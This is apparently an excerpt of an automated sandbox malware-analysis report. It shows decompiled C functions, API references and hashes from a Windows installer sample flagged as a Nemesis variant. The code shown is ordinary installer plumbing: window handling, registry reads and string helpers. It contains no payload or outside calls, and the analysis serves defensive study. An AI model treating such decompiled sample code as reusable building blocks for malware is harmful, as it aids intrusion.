                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CloseHandle
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsyEAEC.tmp
                                                                        • API String ID: 2962429428-958416171
                                                                        • Opcode ID: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                                                        • Instruction ID: ab9e488bef71b432d29da19662b82269d7b8f1628316f3e3d8f7e3aa77a32ace
                                                                        • Opcode Fuzzy Hash: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                                                        • Instruction Fuzzy Hash: 3BE0863244471496E5246F7DAF4D9853B285F413357248726F178F60F0C7389A9B4A9D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 89%
                                                                        			E0040563E(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                        				int _t15;
                                                                        				long _t16;
                                                                        
                                                                        				_t15 = _a8;
                                                                        				if(_t15 != 0x102) {
                                                                        					if(_t15 != 0x200) {
                                                                        						_t16 = _a16;
                                                                        						L7:
                                                                        						if(_t15 == 0x419 &&  *0x423734 != _t16) {
                                                                        							_push(_t16);
                                                                        							_push(6);
                                                                        							 *0x423734 = _t16;
                                                                        							E00404FFF();
                                                                        						}
                                                                        						L11:
                                                                        						return CallWindowProcW( *0x42373c, _a4, _t15, _a12, _t16);
                                                                        					}
                                                                        					if(IsWindowVisible(_a4) == 0) {
                                                                        						L10:
                                                                        						_t16 = _a16;
                                                                        						goto L11;
                                                                        					}
                                                                        					_t16 = E00404F7F(_a4, 1);
                                                                        					_t15 = 0x419;
                                                                        					goto L7;
                                                                        				}
                                                                        				if(_a12 != 0x20) {
                                                                        					goto L10;
                                                                        				}
                                                                        				E00404610(0x413);
                                                                        				return 0;
                                                                        			}





                                                                        0x00405642
                                                                        0x0040564c
                                                                        0x00405668
                                                                        0x0040568a
                                                                        0x0040568d
                                                                        0x00405693
                                                                        0x0040569d
                                                                        0x0040569e
                                                                        0x004056a0
                                                                        0x004056a6
                                                                        0x004056a6
                                                                        0x004056b0
                                                                        0x00000000
                                                                        0x004056be
                                                                        0x00405675
                                                                        0x004056ad
                                                                        0x004056ad
                                                                        0x00000000
                                                                        0x004056ad
                                                                        0x00405681
                                                                        0x00405683
                                                                        0x00000000
                                                                        0x00405683
                                                                        0x00405652
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00405659
                                                                        0x00000000

                                                                        APIs
                                                                        • IsWindowVisible.USER32(?), ref: 0040566D
                                                                        • CallWindowProcW.USER32(?,?,?,?), ref: 004056BE
                                                                          • Part of subcall function 00404610: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Window$CallMessageProcSendVisible
                                                                        • String ID:
                                                                        • API String ID: 3748168415-3916222277
                                                                        • Opcode ID: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                                                        • Instruction ID: 537e1cae7e4c88fb21f4f8cfd237bdd46b0b38e99f2a5e053ca6ba0093d9a5c8
                                                                        • Opcode Fuzzy Hash: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                                                        • Instruction Fuzzy Hash: 4401B171200608AFEF205F11DD84A6B3A35EB84361F904837FA08752E0D77F8D929E6D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 90%
                                                                        			E00406536(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
                                                                        				int _v8;
                                                                        				long _t21;
                                                                        				long _t24;
                                                                        				char* _t30;
                                                                        
                                                                        				asm("sbb eax, eax");
                                                                        				_v8 = 0x800;
                                                                        				_t21 = E004064D5(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
                                                                        				_t30 = _a16;
                                                                        				if(_t21 != 0) {
                                                                        					L4:
                                                                        					 *_t30 =  *_t30 & 0x00000000;
                                                                        				} else {
                                                                        					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
                                                                        					_t21 = RegCloseKey(_a20);
                                                                        					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
                                                                        					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                                                                        						goto L4;
                                                                        					}
                                                                        				}
                                                                        				return _t21;
                                                                        			}







                                                                        0x00406544
                                                                        0x00406546
                                                                        0x0040655e
                                                                        0x00406563
                                                                        0x00406568
                                                                        0x004065a6
                                                                        0x004065a6
                                                                        0x0040656a
                                                                        0x0040657c
                                                                        0x00406587
                                                                        0x0040658d
                                                                        0x00406598
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406598
                                                                        0x004065ac

                                                                        APIs
                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,?,00000000,?,?,Call,?,?,0040679D,80000002), ref: 0040657C
                                                                        • RegCloseKey.ADVAPI32(?,?,0040679D,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsyEAEC.tmp\System.dll), ref: 00406587
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CloseQueryValue
                                                                        • String ID: Call
                                                                        • API String ID: 3356406503-1824292864
                                                                        • Opcode ID: abb8e2472c70d4d58aecb7d0dfcf889930bd109b5a1b9baac0574de2233c5019
                                                                        • Instruction ID: 52dd0fe420a7c1e2827d1a164217834099ee72e945ce70567094b216899e5676
                                                                        • Opcode Fuzzy Hash: abb8e2472c70d4d58aecb7d0dfcf889930bd109b5a1b9baac0574de2233c5019
                                                                        • Instruction Fuzzy Hash: C4017C72500209FADF21CF51DD09EDB3BA8EF54364F01803AFD1AA2190D738D964DBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 77%
                                                                        			E00405F83(WCHAR* _a4) {
                                                                        				WCHAR* _t5;
                                                                        				WCHAR* _t7;
                                                                        
                                                                        				_t7 = _a4;
                                                                        				_t5 =  &(_t7[lstrlenW(_t7)]);
                                                                        				while( *_t5 != 0x5c) {
                                                                        					_push(_t5);
                                                                        					_push(_t7);
                                                                        					_t5 = CharPrevW();
                                                                        					if(_t5 > _t7) {
                                                                        						continue;
                                                                        					}
                                                                        					break;
                                                                        				}
                                                                        				 *_t5 =  *_t5 & 0x00000000;
                                                                        				return  &(_t5[1]);
                                                                        			}





                                                                        0x00405f84
                                                                        0x00405f8e
                                                                        0x00405f91
                                                                        0x00405f97
                                                                        0x00405f98
                                                                        0x00405f99
                                                                        0x00405fa1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00405fa1
                                                                        0x00405fa3
                                                                        0x00405fab

                                                                        APIs
                                                                        • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe,80000000,00000003), ref: 00405F89
                                                                        • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe,80000000,00000003), ref: 00405F99
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CharPrevlstrlen
                                                                        • String ID: C:\Users\user\Desktop
                                                                        • API String ID: 2709904686-3125694417
                                                                        • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                                        • Instruction ID: bd974b3f77e4b05eb9372a1ad14375fba7b947cfa10dd8d614d5bb7090e452f7
                                                                        • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                                        • Instruction Fuzzy Hash: 6CD05EB2401D219EC3126B04DC00D9F63ACEF51301B4A4866E441AB1A0DB7C5D9186A9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004060BD(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                                                        				int _v8;
                                                                        				int _t12;
                                                                        				int _t14;
                                                                        				int _t15;
                                                                        				CHAR* _t17;
                                                                        				CHAR* _t27;
                                                                        
                                                                        				_t12 = lstrlenA(_a8);
                                                                        				_t27 = _a4;
                                                                        				_v8 = _t12;
                                                                        				while(lstrlenA(_t27) >= _v8) {
                                                                        					_t14 = _v8;
                                                                        					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                                                        					_t15 = lstrcmpiA(_t27, _a8);
                                                                        					_t27[_v8] =  *(_t14 + _t27);
                                                                        					if(_t15 == 0) {
                                                                        						_t17 = _t27;
                                                                        					} else {
                                                                        						_t27 = CharNextA(_t27);
                                                                        						continue;
                                                                        					}
                                                                        					L5:
                                                                        					return _t17;
                                                                        				}
                                                                        				_t17 = 0;
                                                                        				goto L5;
                                                                        			}









                                                                        0x004060cd
                                                                        0x004060cf
                                                                        0x004060d2
                                                                        0x004060fe
                                                                        0x004060d7
                                                                        0x004060e0
                                                                        0x004060e5
                                                                        0x004060f0
                                                                        0x004060f3
                                                                        0x0040610f
                                                                        0x004060f5
                                                                        0x004060fc
                                                                        0x00000000
                                                                        0x004060fc
                                                                        0x00406108
                                                                        0x0040610c
                                                                        0x0040610c
                                                                        0x00406106
                                                                        0x00000000

                                                                        APIs
                                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                                                        • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060E5
                                                                        • CharNextA.USER32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060F6
                                                                        • lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                                        • String ID:
                                                                        • API String ID: 190613189-0
                                                                        • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                                        • Instruction ID: 2f06b96f93541eceebcae48a9adfe7aedd37cb678349478f8cad11de2473fd3e
                                                                        • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                                        • Instruction Fuzzy Hash: 0BF0F631104054FFDB12DFA4CD00D9EBBA8EF06350B2640BAE841FB321D674DE11A798
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%